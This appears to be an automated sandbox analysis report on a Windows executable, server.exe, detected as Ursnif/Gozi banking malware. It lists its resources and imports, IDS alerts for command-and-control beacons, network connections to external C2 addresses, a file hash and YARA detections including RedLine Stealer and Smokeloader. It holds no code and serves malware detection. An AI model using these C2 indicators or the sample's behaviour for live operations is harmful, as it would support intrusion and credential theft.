RT_ICON | 0x2701d18 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Serbian | Italy
RT_ICON | 0x27026a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Serbian | Italy
RT_DIALOG | 0x2705160 | 0x86 | data | |
RT_STRING | 0x27051e8 | 0x2be | data | |
RT_STRING | 0x27054a8 | 0x492 | data | |
RT_STRING | 0x2705940 | 0x5c6 | data | |
RT_STRING | 0x2705f08 | 0x118 | data | |
RT_STRING | 0x2706020 | 0x52a | data | |
RT_ACCELERATOR | 0x2702b80 | 0x48 | data | Serbian | Italy
RT_ACCELERATOR | 0x2702bc8 | 0x18 | data | Serbian | Italy
RT_GROUP_CURSOR | 0x2703050 | 0x22 | data | |
RT_GROUP_CURSOR | 0x2704d30 | 0x30 | data | |
RT_GROUP_CURSOR | 0x2704f40 | 0x22 | data | |
RT_GROUP_ICON | 0x26fc2e0 | 0x68 | data | Serbian | Italy
RT_GROUP_ICON | 0x26ef948 | 0x68 | data | Serbian | Italy
RT_GROUP_ICON | 0x26f6170 | 0x76 | data | Serbian | Italy
RT_GROUP_ICON | 0x2702b08 | 0x76 | data | Serbian | Italy
RT_VERSION | 0x2704f68 | 0x1f8 | data | |
None | 0x2702be0 | 0xa | data | |
DLL | Import
KERNEL32.dll | CreateHardLinkA, CallNamedPipeW, GetConsoleAliasesA, GetWindowsDirectoryA, GlobalAlloc, WideCharToMultiByte, LoadLibraryW, GetStringTypeExW, GetExitCodeProcess, lstrcpynW, GetFileAttributesW, LocalReAlloc, WriteConsoleW, GetBinaryTypeW, SetLastError, GetProcAddress, VirtualAlloc, OpenJobObjectA, GetFileType, CreateEventW, EnumDateFormatsA, FreeEnvironmentStringsW, GetPrivateProfileSectionA, GetStringTypeW, FindAtomW, DeleteTimerQueueTimer, GlobalAddAtomW, OpenFileMappingA, LCMapStringW, HeapSize, EnumSystemCodePagesW, GetStartupInfoW, HeapAlloc, GetLastError, HeapFree, SetUnhandledExceptionFilter, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, HeapReAlloc, RaiseException, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LoadLibraryA, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetModuleHandleA, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetLocaleInfoA
USER32.dll | NotifyWinEvent, InvalidateRgn, CreateMDIWindowA, LoadMenuW, GetMenuInfo, ScreenToClient
GDI32.dll | GetGlyphIndicesA
Language of compilation system | Country where language is spoken
Serbian | Italy
          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          192.168.2.45.44.43.1749695802033203 03/16/23-07:23:24.710750TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4969580192.168.2.45.44.43.17
          192.168.2.45.44.43.1749695802033204 03/16/23-07:23:24.710750TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4969580192.168.2.45.44.43.17
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Mar 16, 2023 07:23:24.650625944 CET | 49695 | 80 | 192.168.2.4 | 5.44.43.17
          Mar 16, 2023 07:23:24.707762957 CET | 80 | 49695 | 5.44.43.17 | 192.168.2.4
          Mar 16, 2023 07:23:24.707907915 CET | 49695 | 80 | 192.168.2.4 | 5.44.43.17
          Mar 16, 2023 07:23:24.710750103 CET | 49695 | 80 | 192.168.2.4 | 5.44.43.17
          Mar 16, 2023 07:23:24.763972044 CET | 80 | 49695 | 5.44.43.17 | 192.168.2.4
          Mar 16, 2023 07:23:24.765341997 CET | 80 | 49695 | 5.44.43.17 | 192.168.2.4
          Mar 16, 2023 07:23:24.765438080 CET | 49695 | 80 | 192.168.2.4 | 5.44.43.17
          Mar 16, 2023 07:23:24.768033028 CET | 49695 | 80 | 192.168.2.4 | 5.44.43.17
          Mar 16, 2023 07:23:24.822140932 CET | 80 | 49695 | 5.44.43.17 | 192.168.2.4
          Mar 16, 2023 07:23:44.814861059 CET | 49696 | 80 | 192.168.2.4 | 31.41.44.108
          Mar 16, 2023 07:23:47.821590900 CET | 49696 | 80 | 192.168.2.4 | 31.41.44.108
          Mar 16, 2023 07:23:53.837632895 CET | 49696 | 80 | 192.168.2.4 | 31.41.44.108
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Mar 16, 2023 07:22:03.757394075 CET | 56572 | 53 | 192.168.2.4 | 8.8.8.8
          Mar 16, 2023 07:22:03.788410902 CET | 53 | 56572 | 8.8.8.8 | 192.168.2.4
          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
          Mar 16, 2023 07:22:03.757394075 CET | 192.168.2.4 | 8.8.8.8 | 0xe6b9 | Standard query (0) | checklist.skype.com | A (IP address) | IN (0x0001) | false
          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
          Mar 16, 2023 07:22:03.788410902 CET | 8.8.8.8 | 192.168.2.4 | 0xe6b9 | Name error (3) | checklist.skype.com | none | none | A (IP address) | IN (0x0001) | false
          • 5.44.43.17
          No statistics
          Target ID:0
          Start time:07:21:56
          Start date:16/03/2023
          Path:C:\Users\user\Desktop\server.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\server.exe
          Imagebase:0x400000
          File size:307200 bytes
          MD5 hash:A4071382A33BB9FA55FF8BF8B111BC39
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.560851312.0000000002D56000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.560764513.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:low

          No disassembly